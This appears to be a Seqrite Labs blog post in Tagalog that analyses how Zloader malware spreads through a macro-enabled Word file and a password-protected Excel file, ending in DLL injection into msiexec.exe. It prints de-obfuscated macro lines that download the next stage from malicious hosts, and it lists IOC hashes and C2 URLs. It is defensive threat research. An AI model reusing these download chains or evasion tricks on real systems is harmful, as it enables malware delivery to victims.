• Mga Produkto at Serbisyo
        • Ulap

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Sa Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Maliit na negosyo

          • SOHO Total Edition
        • Serbisyo

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersecurity at Data Privacy Kamalayan
  • Solutions
    • BFSI
    • Edukasyon
    • Pamahalaan
    • Healthcare
    • ITeS
    • manufacturing
  • kompanya
    • Tungkol samin Seqrite
    • Pamumuno
    • Mga parangal at Sertipikasyon
    • silid-basahan
  • Kasosyo
    • Partner Program
    • Hanapin ang Kasosyo
    • Maging isang Kasosyo
  • Suporta
  • Mga mapagkukunan
    • blog
    • Puting papel
    • Mga Datasheet
    • Pag-aaral ng Kaso
    • Mga Ulat sa Banta
    • Manual
    • PoV
    • Unawa sa Data Privacy
    • Suriin ang Iyong Iskor sa Panganib
    • Mga Diyalogo ng DPDP
    • Oras ng Pagkapribado
Seqrite Labs Blog
Makipag-ugnay sa Sales Inaatake?
  • Mga Produkto at Serbisyo
        • Ulap

          • Endpoint Protection
          • Endpoint Detection and Response
          • Mobile Device Management
          • BYOD
          • Extended Detection and Response
          • Zero Trust Network Access
          • Data Privacy
        • Sa Prem

          • Endpoint Protection
          • Endpoint Detection and Response
          • Data Privacy
        • Platform

          • Malware Analysis Platform
        • Maliit na negosyo

          • SOHO Total Edition
        • Serbisyo

          • Threat Intel
          • Digital Risk Protection Services (DRPS)
          • Ransomware Recovery as a Services (RRaaS)
          • DPDP Compliance
          • Managed Detection and Response
          • Cybersecurity at Data Privacy Kamalayan
  • Solutions
    • BFSI
    • Edukasyon
    • Pamahalaan
    • Healthcare
    • ITeS
    • manufacturing
  • kompanya
    • Tungkol samin Seqrite
    • Pamumuno
    • Mga parangal at Sertipikasyon
    • silid-basahan
  • Kasosyo
    • Partner Program
    • Hanapin ang Kasosyo
    • Maging isang Kasosyo
  • Suporta
  • Mga mapagkukunan
    • blog
    • Puting papel
    • Mga Datasheet
    • Pag-aaral ng Kaso
    • Mga Ulat sa Banta
    • Manual
    • PoV
    • Unawa sa Data Privacy
    • Suriin ang Iyong Iskor sa Panganib
    • Mga Diyalogo ng DPDP
    • Oras ng Pagkapribado
Home   /  Phishing  / Zloader: Nagsasama ng Iba't Ibang Office Files
Zloader: Nagsasama ng Iba't Ibang Office Files
23 Marso 2021

Zloader: Nagsasama ng Iba't Ibang Office Files

Sinulat ni Anjali Raut
Anjali Raut
Phishing

Ang Zloader aka Terdot – isang variant ng nakakatakot na Zeus banking malware ay kilala sa agresibong paggamit ng mga dokumentong “.xls”, “.xlsx” bilang paunang vector nito upang maihatid ang payload nito. Sa kabila nito, kamakailan ay nakatagpo kami ng ".docm" na file na ginagamit ng pamilyang Zloader upang maisagawa ang paunang aktibidad nito. Ito ay nagpapakita ng mga kalaban na gustong mag-eksperimento sa mga dokumento ng opisina upang maiwasang matukoy ng mga solusyon sa seguridad.

                                                       Fig.1-Attack Chain

Paunang Vector:

Dito nagsisimula ang kadena ng impeksyon sa file na “.docm” . Ang Docm ay nangangahulugang “Macro-enabled office word document”. Makikita natin sa ibaba ang view ng dokumento na humihiling sa user na paganahin ang nilalaman.

                                                            Fig.2-Tingnan ang Dokumento

Tulad ng maraming iba pang mga dokumento, sinubukan naming obserbahan ang aktibidad nito pagkatapos paganahin ang nilalaman ngunit walang aktibidad dito. Sa pamamagitan ng pagtingin sa VBA code nito, nakuha namin ang aming sagot. Ang pagpapagana ng nilalaman ay hindi gagawa ng pagpapatupad ng macro. Dito magsisimula ang macro execution sa “Document close” gaya ng ipinapakita.

                                                               Fig.3- Macro Function Call

Sa sandaling isara ng biktima ang dokumentong ito, tatawagin ang function na "nnn" na siyang pangunahing function ng VBA macro na ito. Dito, muling tatawagin ang mga subfunction. Dito rin ginagamit ng mga kalaban ang "Userform" upang maisagawa ang susunod na hakbang.

                                                        Fig.4- Sub Function Call

UserForm_Initialize() function ay ginagamit upang i-invoke ang “Userform2”. Ipinapakita ng larawan sa ibaba ang userform2 object. Sa dialog box nito, ang data ng url ay na-chunk at nag-o-overlap sa ika-25 na ComboBox upang itago ang aktwal na data tulad ng ipinapakita sa ibaba.

                                                 Fig.5- Nakatagong Data ng URL

Matapos suriin ang lahat ng ComboBox ng userform2, nahanap namin ang nakakahamak na url na ginagamit upang i-download ang 2nd stage payload.

                                                          Fig.6- Chunked URL Data

Upang buod sa aktibidad sa itaas, ginagamit ng mga kalaban ang for loop para ma-access ang lahat ng value na ito at gumawa ng final url gaya ng ipinapakita sa ibaba,

                                                   Fig.7-Paglikha ng URL sa pagsasara ng dokumento

Ginagamit ang site na "hxxps[:]//feelingfit-always[.]com/1[.]php" na nakakahamak na may markang 11 sa kabuuang virus, upang i-download ang XLS file na pinoprotektahan ng password. Nakatago muli ang password nito sa VBA macro sa "Userform1". Sa pamamagitan ng paggalugad sa data ng userform1, nakuha namin ang nakatagong password.

                                      Fig. 8- Macro code para protektahan ang XLS gamit ang password
                                                          Fig.9- XLS Nakatagong Password

 

Ika-2 Yugto ng Payload:

Ang pagprotekta sa dokumento gamit ang password ay klasikong pamamaraan upang ipagtanggol laban sa mga AV vendor. Ang tamang password ay kinakailangan upang maghukay pa sa pagsusuri. Matapos itugma ang password sa itaas, sa wakas ay makikita na natin ang nilalaman ng excel workbook. Ang XLM macro ay ginagamit sa "Sheet3" upang magsagawa ng karagdagang aktibidad.

                                                   Fig.10- XLS Workbook

Narito ang code ay naka-embed sa iba't ibang mga cell ng dokumento. Ipinapakita ng figure sa ibaba ang na-extract na macro code mula sa workbook sa itaas:

                                                    Fig.11- XLM Macro Code

Dito ginagamit ng mga kalaban ang mga excel na inbuilt na function tulad ng IIF at Switch para i-obfuscate ang data. Ang huling de-obfuscated na code ay makikita sa ibaba,

      WinHttp.WinHttpRequest.5.1.open GET https[:]//santarosafuneralhome[.]com/2.php False

      WinHttp.WinHttpRequest.5.1.SetRequestHeader

      WinHttp.WinHttpRequest.5.1.send

Sa itaas ng nakakahamak na url na mayroong kabuuang marka ng virus na 8 ay ginagamit upang i-download ang 3rd stage payload ng pag-atake na ito.

Panghuling Payload Analysis:

Ang DLL ay ang huling payload ng Zloader. Narito ang DLL ay lubos na na-obfuscated at iniiwasan ang mga direktang tawag sa mga Windows API. Ang pag-hash ay ginagamit upang kalkulahin ang mga address at ginagawa ang tawag gamit ang mga kinakalkula na halaga, na ginagawang mahirap ang pag-reverse.

                                                         Fig.12- Code para sa pagkalkula ng address

Ang DLL ay lumilikha ng prosesong 'msiexec.exe', na isang tunay na proseso ng Microsoft na pagmamay-ari ng Windows Component installer, sa suspendido na mode at nag-inject ng naka-encrypt na file dito.

                                                               Fig.13- 'msiexec.exe' na ginawa sa suspendidong mode
                                                                  Fig.14- Naka-encrypt na file na na-inject sa 'msiexec.exe'

Nag-inject din ito ng routine na magde-decrypt at maglalabas ng malisyosong PE para ipatupad.

                                                                                         Fig.15- Routine sa Pag-decryption

Sa pagtatakda ng konteksto ng thread, ang paunang execution point ay naipasa at sa wakas ang injected code ay naisakatuparan sa resume thread.

Kapag ang thread na ito ng msiexec.exe ay naipatupad, sinusubukan nitong kumonekta sa mga CnC server nito gaya ng ipinapakita,

Dahil naka-down ang mga url na ito sa oras ng pagsusuri, hindi na namin nagawang mas malalim pa ito.

Paghihinuha:

Ipinapakita ng ganitong uri ng pag-atake kung paano binabago ng mga kalaban ang kanilang mekanismo upang simulan ang chain ng impeksyon upang ikompromiso ang biktima. Dapat palaging maging maingat ang user habang binubuksan ang anumang mga file ng opisina. Mabilis na gumaling at Seqrite mga solusyon sa seguridad ng negosyo protektahan ang mga customer nito mula sa naturang mga file. Kaya, tandaan na panatilihing laging na-update ang mga solusyon sa seguridad ng endpoint.

Mga IOC:

DOCM:

117fafb46f27238351f2111e8f01416412044238d2f8378a285063eb9d4eef3d

409ed829f19024045d26cc5d3a06e15a097605e13ba938875eca054a7a4a30b1

91aa050536d834947709776af40c2fde49471d28231de50df0d324cd55101df4

XLS:   52d071922413a3be8815a76118a45bf13d8d323b73ba42377591fd68c59dfc89

URL:

https[://]tiodeitidampheater.tk/post.php

https[://]actes-etatcivil.com/post.php

https[://]ankarakreatif.com/post.php

https[://]www.ramazanyildiz.net/post.php

https[://]hispaniaeng.com/post.php

https[://]www.ifdd.francophonie.org/post.php

 

Eksperto sa Paksang Aralin

Anjali Raut

Priyanka Shinde

 

 

 nakaraang PostIpagtanggol ang iyong mga sistema ng negosyo mula sa paggamit para sa mga ilegal na layunin
susunod na Post  Cryptocurrency Malware: Mga banta sa Bitcoin Mining na kailangan mong malaman...
Anjali Raut

Tungkol kay Anjali Raut

Si Anjali ay isang Associate Security Researcher sa Quick Heal Technologies Ltd. Kasama sa kanyang mga interes ang reverse engineering at pagsusuri ng malware at pangangaso para sa patuloy na...

Mga artikulo ni Anjali Raut »

Kaugnay na Post

  • Goodbye HTA, Hello MSI: Mga Bagong TTP at Cluster ng isang APT na hinimok ng Multi-Platform Attacks

    Abril 8, 2025
  • SVC New Stealer on the Horizon

    Marso 21, 2025
  • QR Code Phishing (Quishing) Attacks: Paano Makita at Pigilan ang mga Ito

    Marso 18, 2025
Mga Tampok na May-akda
  • Seqrite
    Seqrite

    Seqrite ay isang nangungunang tagapagbigay ng mga solusyon sa cybersecurity para sa mga negosyo. Nakatuon...

    Magbasa pa ng mga artikulo ni Seqrite
  • Jyoti Karlekar
    Jyoti Karlekar

    Ako ay isang masugid na manunulat na nasisiyahan sa paggawa ng nilalaman tungkol sa mga umuusbong na teknolohiya at...

    Magbasa pa ng mga artikulo ni Jyoti Karlekar
  • Bineesh P
    Bineesh P

    Ako ay isang masigasig na mahilig sa cybersecurity at isang dedikadong manunulat. May talino...

    Magbasa pa ng mga artikulo ni Bineesh P
  • Sanjay Katkar
    Sanjay Katkar

    Si Sanjay Katkar ay ang Pinagsamang Managing Director ng Quick Heal Technologies...

    Magbasa pa ng mga artikulo ni Sanjay Katkar
Paksa
malamang (25) Pag-atake sa cyber (36) cyber-atake (58) cyberattack (16) cyberattacks (15) Cybersecurity (341) cyber seguridad (34) Banta ng cyber (33) pagbabanta cyber (51) data paglabag (56) mga paglabag sa data (29) pagkawala ng data (28) pag-iwas sa pagkawala ng data (34) data privacy (16) proteksyon ng data (34) data security (19) DLP (50) DPDP (14) DPDPA (17) Encryption (16) endpoint security (113) Seguridad sa enterprise (20) Pagsamantalahan (13) GDPR (14) malware (76) pagsusuri ng malware (14) pag-atake ng malware (23) MDM (27) microsoft (15) MITER ATT&CK (14) Seguridad sa network (26) Phishing (30) ransomware (69) atake ng ransomware (31) atake ng ransomware (31) proteksyon sa ransomware (17) Seqrite (41) Seqrite Encryption (27) Seqrite EPS (33) Seqrite Serbisyo (16) pagbabanta ng pagbabanta (14) Threat Intelligence (21) UTM (34) Kahinaan (16) zero tiwala (13)
Seqrite Labs

Nangunguna sa enterprise IT security solutions provider na pinapasimple ang endpoint, data, at network security na may pinakamahusay na in-class na mga solusyon sa pag-iwas, pagtuklas, at pagtugon sa pagbabanta sa buong mundo.

Magbasa pa tungkol sa Seqrite

Sundan kami:

Mag-subscribe Upang Ang aming Newsletter

Manatiling may alam tungkol sa pinakabagong mga uso at insight sa cybersecurity.

Pagkarga
Mga Produkto at Serbisyo
  • Ulap
  • Endpoint Protection
  • Endpoint Detection and Response
  • Mobile Device Management
  • BYOD
  • Extended Detection and Response
  • Zero Trust Network Access
  • Data Privacy
  • Sa Prem
  • Endpoint Protection
  • Endpoint Detection and Response
  • Data Privacy
  • Platform
  • Malware Analysis Platform
  • Micro Business
  • SOHO Total Edition
  • Serbisyo
  • Threat Intel
  • Digital Risk Protection Services (DRPS)
  • Ransomware Recovery as a Services (RRaaS)
  • DPDP Compliance
  • Managed Detection and Response
  • Cybersecurity at Data Privacy Kamalayan
Mga mapagkukunan
  • blog
  • Puting papel
  • Mga Datasheet
  • Mga Ulat sa Banta
  • Manual
  • PoV
  • Unawa sa Data Privacy
  • Mga Diyalogo ng DPDP
  • Patakaran at Pagsunod
  • EULA
  • GoDeep.AI
  • SIA
  • Oras ng Pagkapribado
Makipag-ugnayan sa amin
  • Mga Rehistradong Tanggapan
  • Pag-usapan natin ang Cybersecurity
Suporta
  • Teknikal na Suporta
  • I-download ang Software
  • Offline Updater
  • Mga Pag-upgrade sa Firmware
  • Upgrade
  • Documentation ng Produkto
Sa
  • Tungkol samin Seqrite
  • Pamumuno
  • Mga Gantimpala at Pagkilala
  • silid-basahan
Kasosyo
  • Partner Program
  • Hanapin ang Kasosyo
  • Maging isang Kasosyo
  • Seqrite certification

© 2026 Quick Heal Technologies Ltd.

Sitemap Mga Patakaran sa Privacy legal Notices Mga Patakaran sa Cookie Mga Tuntunin ng Paggamit